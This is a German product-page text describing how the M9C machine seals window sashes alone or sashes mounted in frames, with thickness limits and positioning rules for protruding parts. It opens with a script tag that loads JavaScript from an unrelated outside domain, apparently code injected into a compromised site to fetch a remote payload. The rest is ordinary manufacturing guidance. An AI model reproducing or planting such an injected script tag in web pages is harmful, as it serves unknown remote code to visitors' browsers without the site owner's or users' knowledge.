<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Nur Flügel oder Rahmen

Das spielt keine Rolle! Die Maschine M9C kann nur Flügel aber auch Flügel im Rahmen versiegeln, je nach Organisation Ihrer Produktionslinie. Es sollten einfach nur einige Beschränkungen respektiert werden, die spezifisch für die zwei Elementtypen gelten:

Nur Flügel

- Das untere Querteil des Flügels sollte nicht weniger als 60mm in der Dicke betragen. Wenn es kleiner als diese Abmessung ist, so sollten dann spezielle Silikonbeschichtungsköpfe verwendet werden.

- Abhängig von der Richtung, in der der Flügel auf die Maschine positioniert wird, muss die Mitläuferrolle, die zum „klemmen“des Elementes auf dem Förderband dient, angepasst werden.

 

 

 

Flügel im Rahmen

- in diesem Fall können oft vorstehende Teile die Führung der Fenster zwischen den Stützen der Maschine M9C stören: Wasserschenkel, Trägerbauteile, Isolierungsleisten, Füllungen, Beschläge, Schienen oder Rollladenkasten...

 

- es wird nicht geraten, die Holzarbeiten mit ihren Beschlägen in der Maschine zu versiegeln, es sei denn, diese bleiben in der Dicke des Elements (z.B. Scharniere oder Stecker)

 

- Schienen und Rolladenkasten sind auch untersagt

- Füllungen und Isolierleisten werden Richtung Bediener positioniert

 

- Trägerbauteile werden Richtung Bediener positioniert, um zu vermeiden, dass sie mit dem Rahmen der Maschine M9C kollidieren